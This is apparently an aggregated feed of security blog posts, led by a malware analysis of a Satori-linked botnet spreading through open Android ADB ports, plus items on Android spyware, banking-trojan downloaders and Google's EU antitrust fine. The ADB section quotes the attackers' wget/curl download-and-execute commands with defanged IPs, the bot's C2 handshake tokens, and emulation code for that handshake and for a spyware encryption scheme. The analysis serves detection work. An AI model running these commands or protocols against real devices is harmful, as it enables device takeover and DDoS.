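    An unauthenticated OPEN like this is exactly what the scanner sends to port 5555."""
    if msg["command"] != "OPEN":
        return None
    dest = msg["data"].rstrip(b"\x00")
    if not dest.startswith(b"shell:"):
        return None
    return dest[len(b"shell:"):].decode("utf-8", "replace")


# The CNXN header quoted in the post, written out as bytes (constructed from the listing).
CAPTURED_CNXN = bytes([
    0x43, 0x4E, 0x58, 0x4E,  # "CNXN"
    0x00, 0x00, 0x00, 0x01,  # arg0 = 0x01000000 (protocol version)
    0x00, 0x00, 0x10, 0x00,  # arg1 = 0x00100000 (max payload size)
    0x07, 0x00, 0x00, 0x00,  # data_length = 7
    0x32, 0x02, 0x00, 0x00,  # data_checksum = 0x232 = sum(b"host::\0")
    0xBC, 0xB1, 0xA7, 0xB1,  # magic = "CNXN" ^ 0xFFFFFFFF
]) + b"host::\x00"

if __name__ == "__main__":
    print(parse_message(CAPTURED_CNXN))
    # A benign OPEN showing what a remote "shell:" request looks like on the wire.
    probe = pack_message(A_OPEN, 2, 0, b"shell:id\x00")
    print(probe[:24].hex(), shell_command(parse_message(probe)))
```

Run against a pcap of port 5555 traffic, `shell_command` on each OPEN gives the exact command an unauthenticated client tried to execute, which is the field worth alerting on.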

The shell script for the July 9 activity can be seen below:

  • cd /dev/; busybox wget hxxp://95[.]215[.]62[.]169/adbs -O -> adbs; sh adbs; rm adbs

Figure 3. ASCII and hex view of the malicious payload from the July 9 activity

In contrast, the payload for the July 15 activity downloads two scripts instead: the earlier “adbs” and a new script called “adbs2”. As before, it removes them after execution:

  • cd /data/local/tmp/; busybox wget hxxp://185[.]62[.]189[.]149/adbs -O -> adbs; sh adbs; curl hxxp://185[.]62[.]189[.]149/adbs2 > adbs2; sh adbs2; rm adbs adbs2

Figure 4. ASCII and hex view of the malicious payload from the July 15 activity

The scripts download the next stage binary for several architectures and launch the corresponding one. Both do the same thing but use different download methods: one uses curl and the other uses the wget built into BusyBox. An example of the wget version can be seen below:

Figure 5. Code of the binary that was downloaded via wget

The binary starts by deleting its own file from the filesystem. It then checks whether its own name is “./.f” and whether it was given the parameter “yItDitb2HvayJvNc.” If so, it resolves the hostname “n[.]ukrainianhorseriding[.]com” through the Google DNS server to obtain the address of the C&C server. Otherwise, it uses the hardwired IP address 95[.]215[.]62[.]169, connecting on port 7267.

It will then close all three stdio streams and get its own IP address, followed by the launch of two child processes.

The first one scans the /proc/[pid]/maps memory-mapped regions of all running processes on the system for open temporary files named smi, xig or trinity. If found, it kills the corresponding process. Trinity could be related to the Android system fuzzer, while smi is a known file belonging to the CoinHive script that mines Monero on hijacked Amazon devices.

The second child process is responsible for spreading the malware as a worm.

The main binary continues by writing all three pids mentioned earlier in binary form to one of the following locations:

Figure 6. Locations where the pids are written

The binary then opens a connection to the C&C server:

Figure 7. Communicating with the C&C server

It then sends a specially crafted message to the C&C server. Its length is 71 bytes and consists of:

  • the string “WWau14TJ8IapVXrrlFq0q5sxB” (25 bytes)
  • the bytes “00 80 00 5A 00 57 00 C8 00 F0 00 1E 00 00” (14 bytes)
  • an appended architecture string, e.g. “arm7”, in a 32-byte array

The C2 then sends the victim a 2-byte number (x), which is interpreted as follows:

  • if x == 505: receive the next 2 bytes from the C2
  • if x == 0xDD99: kill the child processes and exit
  • if x > 1024: close the connection and sleep(10)
  • receive x bytes from the C2 (they are not used; perhaps this version is not finished yet)
  • receive a new x
  • receive a payload of x bytes containing the list of attack targets

Every six communication cycles, the victim responds with a 6-byte sequence (9, 3, 2, 5, 8, 1).

This payload contains a header with the number of targets and IP packet types to be sent, followed by a list of target IPv4 addresses that are modified by an infected host with a randomly generated offset. Up next are port numbers and sleep times before it waits for a continuation and a random payload length. The malware then sends crafted IP packets with a randomly generated payload to the obtained attack list — possibly as part of a DDoS attack.
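The handshake and command loop described above are compact enough to emulate, which is useful for exercising a C2 sandbox or writing a network signature for the 71-byte hello. The model below is an added example, not the malware’s code: it builds the hello from the three fields quoted in the post (25 + 14 + 32 = 71 bytes), implements the dispatch rules for the 2-byte command word, and walks one receive cycle over a constructed byte stream. The post does not state the byte order of the 2-byte word or what the 14-byte field means, so little-endian and an opaque blob are assumed here; the “505 means read the next word as the real command” reading is likewise an assumption.

```python
"""Bot-side emulation of the C2 exchange described in the post (added example,
not the malware's own code).  Assumptions, not stated in the post: the 2-byte
command word is little-endian, and after a 505 the next word is the real command."""
import struct

HELLO_TOKEN = b"WWau14TJ8IapVXrrlFq0q5sxB"                  # 25 bytes, as quoted
HELLO_BLOB = bytes.fromhex("0080005A005700C800F0001E0000")  # 14 bytes, as quoted
ARCH_FIELD_LEN = 32
HEARTBEAT = bytes([9, 3, 2, 5, 8, 1])                       # sent every sixth cycle


def build_hello(arch: str) -> bytes:
    """The 71-byte first message: token, fixed blob, NUL-padded architecture string."""
    field = arch.encode("ascii")[:ARCH_FIELD_LEN].ljust(ARCH_FIELD_LEN, b"\x00")
    return HELLO_TOKEN + HELLO_BLOB + field


def dispatch(x: int) -> str:
    """Classify a 2-byte command word per the rules in the post."""
    if x == 0xDD99:
        return "kill-children-and-exit"
    if x > 1024:
        return "close-and-sleep-10"
    return "read-targets"


def handle(stream: bytes) -> dict:
    """Consume one C2 exchange from `stream` (bytes already received).
    Returns the action taken, the raw target list and how many bytes were used."""
    off = 0
    (x,) = struct.unpack_from("<H", stream, off)
    off += 2
    if x == 505:  # assumed: continuation marker, next word is the real command
        (x,) = struct.unpack_from("<H", stream, off)
        off += 2
    action = dispatch(x)
    if action != "read-targets":
        return {"action": action, "targets": b"", "consumed": off}
    off += x  # x bytes the post says are received but never used
    (n,) = struct.unpack_from("<H", stream, off)
    off += 2
    targets = stream[off:off + n]
    if len(targets) != n:
        raise ValueError("truncated target list")
    off += n
    return {"action": action, "targets": targets, "consumed": off}


def heartbeat(cycle: int) -> bytes:
    """The bot's reply after a given 1-based cycle: the 6-byte sequence every sixth cycle."""
    return HEARTBEAT if cycle % 6 == 0 else b""


if __name__ == "__main__":
    print(len(build_hello("arm7")), build_hello("arm7"))
    # Constructed stream: x=8, eight unused bytes, then a 6-byte target blob.
    sample = b"\x08\x00" + b"\x00" * 8 + b"\x06\x00" + bytes(range(1, 7))
    print(handle(sample))
    print(handle(b"\xf9\x01\x99\xdd"))  # 505 then 0xDD99: exit
```

A signature on the fixed 25-byte token at offset 0 of the first client message, combined with a total length of 71, identifies the hello without depending on the C2 address, which the post shows is already rotated between a hardcoded IP and a DNS name.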

The crafted IP packets consist of the following:

  • UDP with a randomly generated payload of random length
  • TCP SYN packet with a random payload of random length
  • TCP ACK with a random payload of random length
  • UDP with random payload tunneled through Generic Routing Encapsulation (GRE)
  • TCP SYN, after which it will send TCP ACK and ensure that the TCP window size, source port, seq_number and IP identification is consistent with the previous session. There is a three-second wait period between each packet.

An intriguing aspect of the downloaded binaries is that the C&C server 95[.]215[.]62[.]169 was found by researchers to be linked to the Satori variant of the Mirai botnet. The GeoIP information for the two IP addresses involved in the activity shows that both are located in Europe: Spain for 95[.]215[.]62[.]169 and the Netherlands for 185[.]62[.]189[.]149.

It’s reasonable to believe that the same author was behind this sample and Satori. The important and identifiable strings are encrypted using a simple XOR method (see the encrypted string example in Figure 8). Interestingly, this malware version uses a less sophisticated string encryption method than older samples, which used a combination of byte swap and Base62 encoding.

Figure 8. Strings encrypted with XOR method

Their decrypted values can be seen in the figure below. Note that not all of them are used yet.

Figure 9. String values after decryption

As mentioned earlier, the worm function and the search for other potential targets suggest that the two spikes in activity we detected could be a prelude to another, more damaging attack. Perhaps in this instance the threat actors were testing the effectiveness of their tools and tactics in preparation for a more serious attack.

The C&C domain name information shows the same registration e-mail as another C&C server on the domain rippr[.]cc, which was already shut down:

Figure 10. Information on the C&C domain

According to data from Shodan, over 48,000 IoT systems are vulnerable to ADB exploitations. Not all vulnerable systems are exposed as they are usually hidden behind routers with Network Address Translation (NAT). However, due to misconfiguration, they can be made accessible either manually or via UPnP NAT traversal. All multimedia devices, smart TVs, mobile phones, and other devices without additional protection are easy targets for this malware regardless of the user’s password strength.

Mitigation and Trend Micro Solutions

Users who are comfortable changing the settings of their mobile device can go to settings, select “Developer Options” and ensure that “ADB (USB) debugging” and “Apps from Unknown Sources” are turned off. The latter setting is turned off by default but should be double-checked to make sure. If the user suspects that their device is already infected, doing a factory reset can clear the payload.

As a general rule, mobile device users should regularly update their devices to the latest version. Not only do these updates improve the functionality of their devices, but they also address vulnerabilities that attackers can exploit.

Security software designed to combat these kinds of threats is also an option. For example, Trend Micro Smart Home Network™ protects users from this threat via the following intrusion prevention rule:

  • 1134867 EXPLOIT Remote Command Execution via Android Debug Bridge

Indicators of Compromise (IoCs):


  • 79d55852af173612562718544ecdc569b0b8e0094647d609040f8fcc67112cba
  • 144e9093b50d7a0bf92ccc29dbbdab4955a8ef028ec2a4a64f2c16778fc0ba43


  • 2815ab8fe6d48982540524c6ac55e1df3a77a2e90c32114fde05bdc3bb353bea
  • 144e9093b50d7a0bf92ccc29dbbdab4955a8ef028ec2a4a64f2c16778fc0ba43
  • 01eca0d68cc8c2d7ad6aa8021852b57a04b8a4ca7d13e164095b29fd06a1ed9f
  • 4c3983040b2c72e4df9742c1314dcf8cd703805ab6aaa9185324b70fd530746e

Additional analysis and insights from Chunbo Song and Tim Yeh

The post Open ADB Ports Being Exploited to Spread Possible Satori Variant in Android Devices appeared first on .

TrendLabs Security Intelligence Blog

Exobot Android Banking Trojan’s Source Code Leaked Online

Someone leaked the source code for the Exobot Android banking trojan online, leading the malware to circulate widely on the underground web. Bleeping Computer said it received a copy of the source code from an unknown individual in June. In response, it verified the authenticity of the code with both ESET and ThreatFabric. Security researchers […]… Read More

The post Exobot Android Banking Trojan’s Source Code Leaked Online appeared first on The State of Security.

Security Affairs: CSE Malware ZLab – Chinese APT27 ’s long-term espionage campaign in Syria is still ongoing

Researchers at CSE Cybsec ZLab analyzed a malicious code involved in a long-term espionage campaign in Syria attributed to Chinese APT27 group.

A few days ago, the security researcher Lukas Stefanko from ESET discovered an open repository containing some Android applications.



The folder was found on a compromised website at the following URL:


This website is written in Arabic language and translating its content it seems to offer a secure messaging app. The homepage shows how the application works and includes some slides about it.

Security researchers from CSE Cybsec Z-Lab analyzed the content of the folder and discovered an Android spyware that was developed to exfiltrate sensitive information from victims’ devices.

The malicious code was used to compromise entities in the area; the researchers discovered that it was part of the arsenal of a Chinese APT group tracked as APT27, aka Golden Rat Organization.

The APT27 group has focused its activity on Syria over the last couple of years, using both Windows and Android malware to compromise target devices. Its code is not especially sophisticated; nevertheless, the group’s activity is still ongoing.

Searching online, we found only one team of researchers that has tracked the activity of the APT27 group in Syria since 2016: a group of researchers at 360 Threat Intelligence Center.

The analysis published by that team revealed the activity of APT27 in Syria, and the code analyzed by the malware analysts at CSE Cybsec ZLab and the code dissected by 360 Threat Intelligence Center are nearly identical.

The 360 Threat Intelligence Center analysis is dated 2017; the experts at CSE Cybsec collected evidence that the cyber espionage is still ongoing and that the threat actor continues to improve its malicious code.

Further details on the malware samples analyzed by CSE Cybsec, including the IoCs and Yara rules, are available in the report published by researchers at ZLab.

You can download the full ZLAB Malware Analysis Report at the following URL:


Pierluigi Paganini

(Security Affairs – APT27, Syria)

The post CSE Malware ZLab – Chinese APT27 ’s long-term espionage campaign in Syria is still ongoing appeared first on Security Affairs.


Droppers Is How Android Malware Keeps Sneaking Into the Play Store

Catalin Cimpanu, writing for BleepingComputer: For the past year, Android malware authors have been increasingly relying on a solid trick for bypassing Google's security scans and sneaking malicious apps into the official Play Store. The trick relies on the use of a technique that's quite common in desktop-based malware, but which in the last year is also becoming popular on the Android market. The technique involves the usage of "droppers," a term denoting a dual or multiple-stage infection process in which the first stage malware is often a simplistic threat with limited capabilities, and its main role is to gain a foothold on a device in order to download more potent threats. But while on desktop environments droppers aren't particularly efficient, as the widespread use of antivirus software detects them and their second-stage payloads, the technique is quite effective on the mobile scene.

Read more of this story at Slashdot.

After EU ruling, Google CEO Pichai hints Android may not remain free

Google warns that Android may not be free in the future

We reported yesterday that Google was fined a record $5 billion (4.34 billion euros) by the European Commission on Wednesday for illegally abusing the dominance of its Android operating system.

Reacting to the EU ruling, Google’s CEO Sundar Pichai in a lengthy blog post said that “the decision rejects the business model that supports Android, which has created more choice for everyone, not less.”

The EU wants Google to stop pre-loading its Chrome browser and its search engine on Android. However, Google countered by saying that it doesn’t force anyone to use either of them, and that it allows phone makers and developers to easily disable or delete pre-loaded apps on the phone and choose other apps instead.

According to Pichai, the free distribution of the Android platform, and of Google’s suite of applications, is “not only efficient” for phone makers and operators but is also of “huge benefit” for developers and consumers. He also added that “if phone makers and mobile network operators couldn’t include our apps on their wide range of devices, it would upset the balance of the Android ecosystem.” In other words, Pichai said that the phone makers will no longer be forced to bundle these apps but can still choose to do so.

However, Pichai warned that its Android business model could now change due to the EU ruling. “So far, the Android business model has meant that we haven’t had to charge phone makers for our technology or depend on a tightly controlled distribution model. We’ve always agreed that with size comes responsibility. A healthy, thriving Android ecosystem is in everyone’s interest, and we’ve shown we’re willing to make changes. But we are concerned that today’s decision will upset the careful balance that we have struck with Android, and that it sends a troubling signal in favor of proprietary systems over open platforms,” Pichai said.

Pichai also added that Google would be appealing against the EU decision. The search giant has 90 days to change its practices or face penalty payments of up to five percent of the worldwide average daily revenue of its parent company, Alphabet.

With Google’s CEO hinting that the free distribution of its own apps earns the company revenue required to maintain the development of the expensive platform, we could very soon see Google start charging phone makers for using the Android platform.

Source: The Verge

The post After EU ruling, Google CEO Pichai hints Android may not remain free appeared first on TechWorm.

EU slaps Google with record $5 billion fine in Android Antitrust Case

Google fined $5 billion for illegal restrictions on Android use

The European Commission on Wednesday imposed on Google a record $5 billion (4.34 billion euros) fine for illegally abusing the dominance of its Android operating system.

Margrethe Vestager, EU Antitrust Chief who is in charge of the competition policy, said that the U.S. tech giant has been unlawfully using Android’s near-monopoly since 2011 to improve usage of its own search engine and browser and to strengthen its dominant position in general Internet search.

“Today the commission has decided to fine Google 4.34 billion euros (USD 5 billion) for breaching EU antitrust rules,” Vestager told a press conference in Brussels. “Google has used Android as a vehicle to cement the dominance of its search engine. These practices have denied rivals the chance to innovate and compete on the merits. They have denied European consumers the benefits of effective competition in the important mobile sphere.”

Vestager said Google “must put an effective end to this conduct within 90 days or face penalty payments” of up to five percent of the worldwide average daily revenue of its parent company, Alphabet.

“Our case is about three types of restrictions that Google has imposed on Android device manufacturers and network operators to ensure that traffic on Android devices goes to the Google search engine,” said Vestager.

Particularly, Google required manufacturers to pre-install the Google Search app and browser app (Chrome), as a condition for licensing Google’s app store (the Play Store).

The search giant ultimately gave “financial incentives” to manufacturers and mobile network operators, if they exclusively pre-installed the Google Search app on their devices, the commission said.

The Commission also found that Google used the so-called anti-fragmentation agreements to stop phone makers from selling modified versions of Android.

Google said it would be appealing against the fine imposed by EU. “Android has created more choice for everyone, not less. A vibrant ecosystem, rapid innovation, and lower prices are classic hallmarks of robust competition. We will appeal the Commission’s decision,” a Google spokesperson said in a statement.

This statement was backed by Google’s CEO Sundar Pichai, who said in a blog post on the subject, shared on Twitter, that Android’s existence has led to robust competition.

It will be interesting to see how the EU’s decision affects Google’s advertising business, as well as mobile phone manufacturers and app developers.

The post EU slaps Google with record $5 billion fine in Android Antitrust Case appeared first on TechWorm.

Project ‘Fuchsia’: Google is Quietly Working on a Successor To Android

A day after the European Commission fined Google over Android, more details about Fuchsia, a new operating system the company has been working on for several years has emerged. From the report: But members of the Fuchsia team have discussed a grander plan that is being reported here for the first time: Creating a single operating system capable of running all the company's in-house gadgets, like Pixel phones and smart speakers, as well as third-party devices that now rely on Android and another system called Chrome OS, according to people familiar with the conversations. According to one of the people, engineers have said they want to embed Fuchsia on connected home devices, such as voice-controlled speakers, within three years, then move on to larger machines such as laptops. Ultimately the team aspires to swap in their system for Android, the software that powers more than three quarters of the world's smartphones, said the people, who asked not to be identified discussing internal matters. The aim is for this to happen in the next half decade, one person said. But Pichai and Hiroshi Lockheimer, his deputy who runs Android and Chrome, have yet to sign off on any road map for Fuchsia, these people said. The executives have to move gingerly on any plan to overhaul Android because the software supports dozens of hardware partners, thousands of developers -- and billions of mobile-ad dollars. [...] Still, Fuchsia is more than a basement skunkworks effort. Pichai has voiced his support for the project internally, said people familiar with the effort. Fuchsia now has more than 100 people working on it, including venerated software staff such as Matias Duarte, a design executive who led several pioneering projects at Google and elsewhere. Duarte is only working part-time on the project, said one person familiar with the company.

Read more of this story at Slashdot.

Automated money-laundering scheme found in free-to-play games

The scammers automatically created iOS accounts with valid email accounts, then automatically used stolen cards to buy and resell stuff.

Google Warns Android Might Not Remain Free Because of EU Decision

An anonymous reader quotes a report from The Verge: The EU's decision to force Google to unbundle its Chrome and search apps from Android may have some implications for the future of Android's free business model. In a blog post defending Google's decision to bundle search and Chrome apps on Android, Google CEO Sundar Pichai outlines the company's response to the EU's $5 billion fine. Pichai highlights the fact a typical Android user will "install around 50 apps themselves" and can easily remove preinstalled apps. But if Google is prevented from bundling its own apps, that will upset the Android ecosystem. "If phone makers and mobile network operators couldn't include our apps on their wide range of devices, it would upset the balance of the Android ecosystem," explains Pichai, carefully avoiding the fact that phone makers will no longer be forced to bundle these apps but can still choose to do so. Pichai then hints that the free Android business model has relied on this app bundling. "So far, the Android business model has meant that we haven't had to charge phone makers for our technology, or depend on a tightly controlled distribution model," says Pichai. "But we are concerned that today's decision will upset the careful balance that we have struck with Android, and that it sends a troubling signal in favor of proprietary systems over open platforms." While it may be a bluff to court popular opinion, Google is threatening to license Android to phone makers. "[I]f phone makers can bundle their own browsers instead of Chrome and point search queries toward rivals, then that could have implications for Google's mobile ad revenue, which constitutes more than 50 percent of the company's net digital ad revenue," reports The Verge.

Read more of this story at Slashdot.

EU Fines Google Record $5 Billion in Android Antitrust Case

Google has been hit by a record-breaking $5 billion antitrust fine by the European Union regulators for abusing the dominance of its Android mobile operating system and thwarting competitors. That's the largest ever antitrust penalty. Though Android is an open-source and free operating system, device manufacturers still have to obtain a license, with certain conditions, from Google to

Samsung’s Galaxy S10 To Come In Three Sizes, With An In-Display Fingerprint Sensor

Analyst Ming-Chi Kuo says Samsung will launch the Galaxy S10 in three different sizes: 5.8 inches, 6.1 inches, and 6.4 inches. They are nearly the same sizes that Kuo expects Apple's next series of iPhones to come in. The Verge reports: The larger two S10 models will include in-display fingerprint sensors, Kuo says, while the smaller model will include a fingerprint sensor on the side. That suggests the smaller model will be Samsung's entry-level offering, while the larger two will potentially have higher-end specs and features. Another recent rumor says the S10 might include five cameras, adding an additional wide angle option to the back and another lens to the front for capturing portrait effects. It's very likely plans will change between now and when the Galaxy S10 launches, which should be early next year. The next flagship smartphone to come from the South Korean company will be the Galaxy Note 9. It's expected to make its appearance at an event on August 9th.

Read more of this story at Slashdot.

Google Play Users Risk a Yellow Card With Android/FoulGoal.A

English soccer fans have enthusiastically enjoyed the team’s current run in the World Cup, as the tune “Three Lions” plays in their heads, while hoping to end 52 years of hurt. Meanwhile, a recent spyware campaign distributed on Google Play has hurt fans of the beautiful game for some time. Using major events as social engineering is nothing new, as phishing emails have often taken advantage of disasters and sporting events to lure victims.

“Golden Cup” is the malicious app that installs spyware on victims’ devices. It was distributed via Google Play, and “offered” the opportunity to stream games and search for records from the current and past World Cups. McAfee Mobile Security identifies this threat as Android/FoulGoal.A; Google has removed the malicious applications from Google Play.

Once Golden Cup is installed it appears to be a typical sporting app, with multimedia content and general information about the event. Most of this data comes from a web service without malicious activity. However, in the background and without user consent the app silently transfers information to another server.

Data captured

Golden Cup captures a considerable amount of encrypted data from the victim’s device:

  • Phone number
  • Installed packages
  • Device model, manufacturer, serial number
  • Available internal storage capacity
  • Device ID
  • Android version

This spyware may be just the first stage of a greater infection due to its capability to load dex files from remote sources. The app connects to its control server and tries to download, unzip, and decrypt a second stage.

Android/FoulGoal.A detects when the screen is on or off and records this in its internal file scrn.txt, with the strings “on” or “off” to track when users are looking at their screens:

The Message Queuing Telemetry Transport protocol serves as the communication channel between the device and the malicious server to send and receive commands.

Data encryption

User data is encrypted with AES before it is sent to the control server. The Cryptor class provides the encryption and decryption functionality, and its doCrypto function is shared by both operations. The first parameter selects the mode: “1” for encryption and “2” for decryption:

The encryption key is generated dynamically using the SecureRandom function, which produces a unique value on the device to obfuscate the data. The addKey function embeds the encryption key into the encrypted data, and the data, key included, is uploaded to the control server.

We believe the malware author uses this AES encryption technique for any information to be uploaded to escape the detection by Google Bouncer and network inspection products.
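As an added illustration (not McAfee’s code and not the sample’s), here is why the scheme just described is obfuscation rather than confidentiality: the key travels inside the upload, so an analyst holding a captured blob recovers it without any secret. Go’s crypto/rand stands in for SecureRandom; the blob layout (AES-128-CBC, PKCS#7 padding, IV first, key spliced in at an offset derived from the length and a constant) and the constant 7 are assumptions, not details from the sample.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"crypto/rand"
	"errors"
	"fmt"
)

// Assumed blob layout, not taken from the sample: IV || ciphertext, with the
// 16-byte AES key spliced in at keyOffset(). The offset depends on the body
// length and a fixed constant, echoing "the size of the contents and a fixed
// number" from the write-up.
const (
	keyLen      = 16
	fixedNumber = 7 // hypothetical stand-in for the constant in the first stage
)

// keyOffset returns where the key sits inside a blob of the given total length;
// it is kept past the IV so it always lands inside the ciphertext.
func keyOffset(blobLen int) int {
	return aes.BlockSize + (blobLen-keyLen)%fixedNumber
}

func pkcs7Pad(b []byte) []byte {
	n := aes.BlockSize - len(b)%aes.BlockSize
	return append(b, bytes.Repeat([]byte{byte(n)}, n)...)
}

func pkcs7Unpad(b []byte) ([]byte, error) {
	if len(b) == 0 || len(b)%aes.BlockSize != 0 {
		return nil, errors.New("bad padded length")
	}
	n := int(b[len(b)-1])
	if n == 0 || n > aes.BlockSize || !bytes.Equal(b[len(b)-n:], bytes.Repeat([]byte{byte(n)}, n)) {
		return nil, errors.New("bad padding")
	}
	return b[:len(b)-n], nil
}

// PackUpload mirrors the described scheme only to construct sample input: a
// fresh random key (crypto/rand standing in for Java's SecureRandom), AES-CBC
// encryption, and the key embedded into the encrypted data before upload.
func PackUpload(plaintext []byte) ([]byte, error) {
	key, iv := make([]byte, keyLen), make([]byte, aes.BlockSize)
	if _, err := rand.Read(key); err != nil {
		return nil, err
	}
	if _, err := rand.Read(iv); err != nil {
		return nil, err
	}
	block, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	padded := pkcs7Pad(append([]byte(nil), plaintext...))
	ct := make([]byte, len(padded))
	cipher.NewCBCEncrypter(block, iv).CryptBlocks(ct, padded)
	body := append(iv, ct...)
	off := keyOffset(len(body) + keyLen)
	blob := append(append(append([]byte(nil), body[:off]...), key...), body[off:]...)
	return blob, nil
}

// UnpackUpload is the analyst's side: recover the key from a captured blob and
// decrypt it. No secret is needed, which is exactly why this is obfuscation
// rather than confidentiality.
func UnpackUpload(blob []byte) ([]byte, error) {
	if len(blob) < keyLen+2*aes.BlockSize {
		return nil, errors.New("blob too short")
	}
	off := keyOffset(len(blob))
	key := blob[off : off+keyLen]
	body := append(append([]byte(nil), blob[:off]...), blob[off+keyLen:]...)
	iv, ct := body[:aes.BlockSize], body[aes.BlockSize:]
	if len(ct)%aes.BlockSize != 0 {
		return nil, errors.New("ciphertext not block aligned")
	}
	block, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	pt := make([]byte, len(ct))
	cipher.NewCBCDecrypter(block, iv).CryptBlocks(pt, ct)
	return pkcs7Unpad(pt)
}

func main() {
	// Constructed sample resembling the device fields the spyware collects.
	blob, _ := PackUpload([]byte("model=constructed;android=8.0;id=PLACEHOLDER"))
	pt, err := UnpackUpload(blob)
	fmt.Printf("%s %v\n", pt, err)
}
```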

Our initial analysis suggests there were at least 300 infections, which we suspect occurred between June 8‒12, before the first World Cup matches began.

The second round

The second phase of the attack leverages an encrypted dex file. The file has a .data extension and is downloaded and dynamically loaded by the first-stage malware; it is extracted with the same mechanism used to upload the encrypted files. The location of the decryption key can be identified from the size of the contents and a fixed number in the first-stage malware.

After decryption, we can see out.dex in zipped format. The dex file has spy functions to steal SMS messages, contacts, multimedia files, and device location from infected devices.

The control server used in the second stage differs from the first stage’s, but the encryption methodology and the folder structure on the remote server are identical to the first stage.

We found one victim’s GPS location information and recorded audio files (.3gp) among the encrypted data on the control server.


We have also discovered two other variants of this threat created by the same authors and published to Google Play as dating apps. Although all the apps have been removed from Google Play, we still see indications of infections from our telemetry data, so we know these apps are active on some users’ devices.

Our telemetry data indicates that although users around the world have downloaded the app, the majority of downloads took place in the Middle East, most likely as a result of a World Cup–themed Twitter post in Hebrew directing people to download the app for a breakdown of the latest events.

McAfee Mobile Security users are protected against all the variants of this threat, detected as Android/FoulGoal.A.

The post Google Play Users Risk a Yellow Card With Android/FoulGoal.A appeared first on McAfee Blogs.

Anubis Strikes Again: Mobile Malware Continues to Plague Users in Official App Stores

IBM X-Force mobile malware researchers have observed several developers actively uploading Android malware downloaders to the Google Play Store.

Following ongoing campaigns against Google Play, our research team has been monitoring banking malware activity in official app stores. The team recently reported that downloader apps in the store are being used as the first step in an infection routine that fetches the Marcher (aka Marcher ExoBot) and BankBot Anubis mobile banking Trojans. Users who unknowingly install the app on their devices are subsequently infected. Cybercriminals use these banking Trojans to facilitate financial fraud by stealing login credentials to banking apps, e-wallets and payment cards.

Starting in June, our team discovered a number of new malware downloader samples that infect users with BankBot Anubis (aka Go_P00t). The campaign features at least 10 malicious downloaders disguised as various applications, all of which fetch mobile banking Trojans that run on Android-based devices. While the number of downloaders may seem modest, each of those apps can fetch more than 1,000 samples from the criminal’s command-and-control (C&C) servers.

Finding new downloaders in the app store in connection with the BankBot Anubis malware could suggest that:

  • A given malware distributor/cybercrime faction has shifted from using Marcher to distributing BankBot Anubis; or
  • The threat actors distributing the malware on Google Play are offering their “expertise” as a service, spreading malware downloaders for different cybercrime factions that use mobile Trojans to facilitate financial fraud — aka “downloader-as-a-service.”

Such cybercrime services are common in the fraud and malware black markets. They entail a proven ability to infiltrate Google Play and plant malicious downloaders under the guise of benign-looking apps. These services can likely maintain the downloader’s C&C servers long enough to generate a steady stream of new infections, suggesting the thought-out operational security and know-how characteristic of organized cybercrime groups.

Read the white paper: Worried about mobile security? You should be

An Era of Mobile Malware Downloaders

As app store operators layer security to stymie the efforts of malicious developers, black-hat app distributors find ways to sidestep them. To circumvent ever-evolving app store defenses, mobile malware distributors rely on a strategy from the PC malware realms: Instead of uploading the actual malware to the store, which can result in sampling and detection at a very early stage in the distribution chain, they upload a downloader that may seem rather innocuous compared to actual malware.

In general, a downloader app is more likely to survive security checks and recurring scans, and once it lands on a user’s device, it can fetch the intended malware app. As the Chinese general Sun Tzu wrote in “The Art of War,” “The greatest victory is that which requires no battle.”

Sample Downloader Campaign From Current Analyses

In the current campaign, according to X-Force researchers, the downloader apps target Turkish-speaking users. They differ in type and visual style — from online shopping to financial services and even an automotive app — and are designed to look legitimate and enticing to users.

Figure 1: Examples of malware downloader apps found on Google Play.

The variety of apps and styles indicates a large investment of resources on the part of the campaign’s operators, suggesting that a cybercrime service, rather than a single cybercrime faction, is likely responsible.

The downloaders themselves are rather stealthy: all but one of the samples were absent from VirusTotal, and the one that was present had zero detections by antivirus engines.

Figure 2: No detection rates on malicious downloaders.

In this campaign, the malicious downloader apps X-Force detected have the same code base as three apps that ThreatFabric reported in January 2018. The following characteristics show the similarity:

Figure 3: Code from sample downloader reported by ThreatFabric in January 2018.

Figure 4: Code from sample downloader discovered by X-Force in June 2018.

The resemblance is even more striking in the figure below. By removing all the key instances (**pE2**) from the string, we produced the same string from the January sample:

Figure 5: The code bases are very similar, suggesting that the same developer produced both apps.

With 10 downloaders at this point, the campaign appears to be scaling up.

Over time, we’ve seen the code evolve. Between downloader versions, the developers added simple obfuscation and expanded the downloader’s capabilities. The code was also altered slightly to avoid detection by Google Play’s security controls.

According to X-Force’s analysis, these changes suggest that the downloader app is being maintained on an ongoing basis — another sign that it is a commodity offered to cybercriminals or a specific group that’s focused on defrauding Turkish mobile banking users.

Anubis Masquerades as Google Protect

After a successful installation of the malicious downloader, the app fetches BankBot Anubis from one of its C&C servers. The BankBot Anubis malware then masquerades as an app called “Google Protect” and prompts the user to grant it accessibility rights.

Figure 6: App names in Turkish.

Figure 7: Malware asking for accessibility to keylog user credentials.

Why ask for accessibility? BankBot Anubis uses Android’s Accessibility services to perform keylogging as a way to obtain the infected user’s credentials when he or she accesses a targeted mobile banking app. In most Android banking Trojans, the malware launches a fake overlay screen when the user accesses a target app. The user then taps his or her account credentials into the fake overlay, which allows the malware to steal the data. BankBot Anubis streamlines this process.

By keylogging the user’s login information, the attacker can steal credentials from any app while avoiding the need to create custom overlays for each target. This malware is also able to take screen captures of the user’s screen, which it likely uses to steal credentials since the keyboard strokes are visible. These features are staples of PC banking malware and are evolving in Android malware as well.

The downloader apps in this particular campaign were designed to address Turkish users. With different botnets and configurations, BankBot Anubis itself also targets users in the following countries:

  • Australia
  • Austria
  • Azerbaijan
  • Belarus
  • Brazil
  • Canada
  • China
  • Czech Republic
  • France
  • Georgia
  • Germany
  • Hong Kong
  • India
  • Ireland
  • Israel
  • Japan
  • Kazakhstan
  • Luxembourg
  • Morocco
  • Netherlands
  • New Zealand
  • Oman
  • Poland
  • Russia
  • Scotland
  • Slovakia
  • Spain
  • Taiwan
  • Turkey
  • U.K.
  • U.S.

While there were 10 downloader apps in the Google Play Store at the time of this writing, the campaign is rather hefty. X-Force estimated the magnitude of campaigns on Google Play by the number of downloads, as well as the number and variety of payloads found. In one case, the researchers fetched more than 1,000 new samples of BankBot Anubis from just one C&C server. Each sample has a different MD5 signature, few of which were documented by any antivirus engine when tested against VirusTotal.

Official App Stores: A Fraudster’s Holy Grail

